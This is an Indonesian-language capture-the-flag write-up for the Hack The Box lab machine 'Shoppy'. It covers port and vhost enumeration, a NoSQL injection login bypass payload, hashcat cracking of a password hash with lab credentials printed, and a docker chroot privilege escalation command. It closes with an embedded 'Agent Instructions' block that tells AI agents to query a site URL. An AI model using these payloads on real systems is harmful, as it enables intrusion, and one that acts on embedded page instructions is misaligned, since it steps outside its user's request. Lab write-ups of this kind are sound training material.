# Shoppy ### Port Scanning ```bash sudo nmap -sV -sT -sC -oN nmap_initial -T4 shoppy.htb ``` ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA) | 256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA) |_ 256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519) 80/tcp open http nginx 1.23.1 |_http-title: Shoppy Wait Page |_http-server-header: nginx/1.23.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Hasil dari port scanning hanya menunjukkan port 80 dan 22. Sambil menunggu full port scan, kita bisa enumerasi directory dan subdomain. ### Directory Scanning ``` ffuf -recursion-depth 3 -t 100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://shoppy.htb/FUZZ -r ...... ________________________________________________ login [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 559ms] admin [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 261ms] ``` ### Vhost Discovery ```bash ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://shoppy.htb -H "Host: FUZZ.shoppy.htb" .... ________________________________________________ mattermost [Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 195ms] ``` Jangan lupa tambahkan subdomain yang kita temukan ke /etc/hosts. Oke dari enumerasi awal, kita mendapatkan data berikut: * Open Port: 80, 22 * Admin Page: * Other Subdomain: ### Initial Access NoSQL Injection at Login Page Setelah beberapa kali melakukan fuzzing dan trial error, saya berhasil masuk ke dashboard admin menggunakan payload berikut: ``` admin'||1==1%00 ```

Referensi: {% embed url="" %}

Tidak banyak menu yang bisa di explore. Jadi kita langsung coba cek di menu Search for Users. Kita gunakan payload yang sebelumnya kita pakai untuk masuk.

Menggunakan hash-identifier, kita bisa mengetahui jenis hash nya.

Menggunakan wordlist rockyou yang ada di Kali Linux, kita crack dua hash password yang kita dapat sebelumnya menggunakan hashcat. ``` hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.lst ```

Satu password berhasil di crack, yakni password milik **josh**. ``` 6ebcea65320589ca4f2f1ce039975995:remembermethisway ``` Kita gunakan kredensial tersebut untuk login ke dashboard Mattermost. Akses: * Login: **** * Username: **josh** * Password: **remembermethisway** Pada channel Deploy Machine, kita akan mendapatkan history chat yang menampikan kredensial yang dapat kita gunakan untuk login SSH.

### Get User Flag Login ke server menggunakan kredensial yang didapat sebelumnya.

### Privilege Escalation Pertama, jalankan command ``` sudo -l ``` Dan masukkan password user jaegar yang kita dapat sebelumnya. ``` User jaeger may run the following commands on shoppy: (deploy) /home/deploy/password-manager ``` Selanjutnya kita jalankan command ``` sudo -u deploy /home/deploy/password-manager ``` Namun ternyata kita harus memasukkan password.

Oke, selanjutnya kita download file password-manager ke mesin kita. Lalu kita coba analisa menggunakan **Cutter**. Tidak diperlukan skill reverse engineering disini (karena ini juga mesin dengan kategori Easy), dan Master Password nya bisa langsung kita temukan karena disimpansecara hard-coded didalam aplikasi.

Selanjutnya kita gunakan password yang kita dapatkan dari step sebelumnya untuk mengeksekusi password-manager.

Selanjutnya kita gunakan kredensial tersebut untuk login ke user deploy.

Saat menjalankan perintah **sudo -l** kita mendapati error ``` Sorry, user deploy may not run sudo on shoppy. ``` Setelah menjalankan LinPEAS, kita mendapati info bahwa docker kemungkinan adalah PE Vector.

Untuk trick PE via docker, kita bisa cek di GTFObins. * ```bash docker run -v /:/mnt --rm -it alpine chroot /mnt bash ```

Oke mungkin itu saja write-up kali ini. Semoga ada yang bisa dipelajari dari writeup mesin Shoppy. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://htb.linuxsec.org/machine-writeup/htb/shoppy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.